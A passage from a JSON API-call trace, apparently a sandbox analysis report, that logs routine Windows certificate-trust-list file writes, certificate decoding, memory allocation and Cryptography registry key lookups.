21:41:29,718", + "thread_id": "9928", + "caller": "0x756b74cc", + "parentcaller": "0x742054e1", + "category": "filesystem", + "api": "NtWriteFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000740" + }, + { + "name": "HandleName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + }, + { + "name": "Buffer", + "value": "p\\x00\\x00\\x00\\x01\\x01\\x02 \\x01\\x00\\x00\\x00\\xae\\x00\\x00\\x00\\x04\\xad\\\\xf5\\xe9\\x8f\\xdb\\x01(\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x80\\xb4\\x87\\xc2\\xb7\\x87\\xdb\\x01\\x84\\x03\\x00\\x00(\\x00\\x00\\x00\\x05c*\\xe1\\x00\\x00\\x00\\x00" + }, + { + "name": "Length", + "value": "112" + } + ], + "repeated": 0, + "id": 2721 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b74cc", + "parentcaller": "0x74205607", + "category": "filesystem", + "api": "NtWriteFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000740" + }, + { + "name": "HandleName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + }, + { + "name": "Buffer", + "value": "Y\\x1e\\x01\\x00" + }, + { + "name": "Length", + "value": "4" + } + ], + "repeated": 0, + "id": 2722 + }, + { + "timestamp": "2025-03-07 21:41:29,718", + "thread_id": "9928", + "caller": "0x756b74cc", + "parentcaller": "0x74205634", + "category": "filesystem", + "api": "NtWriteFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000073c" + }, + { + "name": "HandleName", + "value": "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506" + }, + { + "name": "Buffer", + "value": "MSCF\\x00\\x00\\x00\\x00Y\\x1e\\x01\\x00\\x00\\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x01\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00I\\x00\\x00\\x00\\x06\\x00\\x01\\x00\\xea\\xdf\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00;Za\\x86 \\x00authroot.stl\\x0098\\xd3?\\xb76\\x00\\x80CK\\xc4\\x9a\t\\xa7\\x06X\\xf0\\x1e\\x11E\\xf9W\\xfc\\xda'\\xaa\\xbe\\xea\\x1a\\xb9\\xfa\\xa9\\xfd\\xb0\\x10-@w0Z\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0b1L\\x04JM\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00\\x00\\x000\\x82\\x01,\\x04\\x14\\x18\\xf7\\xc1\\xfc\\xc3\t\\x02\\x03\\xfd[\\xaa/\\x86\\x1auIv\\xc8\\xdd%1\\x82\\x01\\x120\\x18\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bh1\n\\x04\\x08\\x00\\x006\\x04M\\xdf\\xd3\\x01" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\EncodedCtl" + } + ], + "repeated": 0, + "id": 2778 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x76800725", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x800\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\t\\x02\t\\x14\\x01\\xdbq\\x1e\\x130p\\xaf\\x17\r250128004632Z0\t\\x06\\x05+\\x0e\\x03\\x02\\x1a\\x05\\x00\\x00\\x00" + }, + { + "name": "Flags", + "value": "0x00008004" + } + ], + "repeated": 0, + "id": 2779 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x770305bc", + "parentcaller": "0x77037af3", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05a90000" + }, + { + "name": "RegionSize", + "value": "0x00200000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2780 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7703061b", + "parentcaller": "0x77037af3", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05a90000" + }, + { + "name": "RegionSize", + "value": "0x0002f000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2781 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x768008d2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x1130\\x82\\x11/\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x034\\x04\\x82\\x11\\x1f0\\x82\\x11\\x1b0\t\\x02\\x01\\x01\\x02\\x01\\x02\\x02\\x01\\x010Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04\\x1d\\xb9l\\xa9\\xcbi\\x94\\xc5\\\\xe6\\xb6\\xa6\\x03\\xbb\\xd2\\xb8\\xdcTC\\x17(\\x99\\x0c\\x06\\x01P\\x1d\\x9dd\\xc0YF+\\xdc\\xc8\\x03\\x1d\\x05\\xb4-\\xa8\t\\xf7\\x99A\\xed\\x04\\xfb\\xe5W\\xba&\\x04\\xf6\\x11R\\xce\\x14e;/v+\\xc00Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04 \\x82\\xa1\\xf9gh\\xa8\\xe4\\xdb\\x94\\x98\\xe2\\xe1h\\x87\\xe4\tm 538<\\xaf\\x14\\xaa\\xd7\\x08\\x18\\xf0\\xfd\\x16\\x9b\\xd3\\xff|'\\x82\\xd4\\x87\\xb7N$F;\\xfb\\xae\\xbe\\xc8#R +\\xaaD\\x05\\xfeT\\xf9\\xd5\\xf1\\x1dE\\x9a0Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04\\xaf\\xe4\\xf3\\x94,\\xdf\\xa6'" + }, + { + "name": "Flags", + "value": "0x00008004" + } + ], + "repeated": 0, + "id": 2782 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x058e8000" + }, + { + "name": "RegionSize", + "value": "0x0002d000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 2783 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05928000" + }, + { + "name": "RegionSize", + "value": "0x0001e000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 2784 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05869000" + }, + { + "name": "RegionSize", + "value": "0x00011000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 2785 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05856000" + }, + { + "name": "RegionSize", + "value": "0x00011000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 2786 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0057e000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 2787 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00579000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 2788 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05a91000" + }, + { + "name": "RegionSize", + "value": "0x0002c000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 2789 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701f645", + "parentcaller": "0x77034248", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x058e8000" + }, + { + "name": "RegionSize", + "value": "0x0002d000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2790 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701f645", + "parentcaller": "0x77034713", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05928000" + }, + { + "name": "RegionSize", + "value": "0x0001e000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2791 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701f645", + "parentcaller": "0x77034248", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05a91000" + }, + { + "name": "RegionSize", + "value": "0x0002c000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2792 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f72e3", + "parentcaller": "0x767ea1fc", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x06\\x140\\x82\\x03\\xfc\\xa0\\x03\\x02\\x01\\x02\\x02\\x133\\x00\\x00\\x00q9\\xee\\x0eJ\\x97o\nm\\x00\\x00\\x00\\x00\\x00q0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x811\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1+0)\\x06\\x03U\\x04\\x03\\x13\"Microsoft Certificate List CA 20110\\x1e\\x17\r240912201741Z\\x17\r250911201741Z0\\x81\\x891\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2793 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701f645", + "parentcaller": "0x77037a44", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00579000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2794 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f72e3", + "parentcaller": "0x767ea1fc", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x07\r0\\x82\\x04\\xf5\\xa0\\x03\\x02\\x01\\x02\\x02\na\\x11l\\x92\\x00\\x00\\x00\\x00\\x00\\x070\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x881\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1200\\x06\\x03U\\x04\\x03\\x13)Microsoft Root Certificate Authority 20100\\x1e\\x17\r110329185839Z\\x17\r260329190839Z0\\x81\\x811\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2795 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f72e3", + "parentcaller": "0x767ea1fc", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x06\\x140\\x82\\x03\\xfc\\xa0\\x03\\x02\\x01\\x02\\x02\\x133\\x00\\x00\\x00q9\\xee\\x0eJ\\x97o\nm\\x00\\x00\\x00\\x00\\x00q0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x811\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1+0)\\x06\\x03U\\x04\\x03\\x13\"Microsoft Certificate List CA 20110\\x1e\\x17\r240912201741Z\\x17\r250911201741Z0\\x81\\x891\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2796 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767f72e3", + "parentcaller": "0x767ea1fc", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x07\r0\\x82\\x04\\xf5\\xa0\\x03\\x02\\x01\\x02\\x02\na\\x11l\\x92\\x00\\x00\\x00\\x00\\x00\\x070\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x881\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1200\\x06\\x03U\\x04\\x03\\x13)Microsoft Root Certificate Authority 20100\\x1e\\x17\r110329185839Z\\x17\r260329190839Z0\\x81\\x811\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2797 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701f645", + "parentcaller": "0x77037a44", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0057e000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2798 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ac98b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2799 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Cryptography\\OID" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID" + } + ], + "repeated": 0, + "id": 2800 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 2801 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000724" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 0" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0" + } + ], + "repeated": 0, + "id": 2802 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006b8" + }, + { + "name": "ObjectAttributesName", + "value": "CryptDllVerifyEncodedSignature" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllVerifyEncodedSignature" + } + ], + "repeated": 0, + "id": 2803 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 2804 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000724" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 1" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1" + } + ], + "repeated": 0, + "id": 2805 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006b8" + }, + { + "name": "ObjectAttributesName", + "value": "CryptDllVerifyEncodedSignature" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CryptDllVerifyEncodedSignature" + } + ], + "repeated": 0, + "id": 2806 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": false, + "return": "0xffffffff8000001a", + "pretty_return": "NO_MORE_ENTRIES", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 2807 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ac98b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2808 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Cryptography\\OID" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID" + } + ], + "repeated": 0, + "id": 2809 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 2810 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000724" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 0" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0" + } + ], + "repeated": 0, + "id": 2811 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006b8" + }, + { + "name": "ObjectAttributesName", + "value": "CryptDllImportPublicKeyInfoEx2" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllImportPublicKeyInfoEx2" + } + ], + "repeated": 0, + "id": 2812 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000724" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 2813 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000724" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 1" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1" + } + ], + "repeated": 0, + "id": 2814 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, 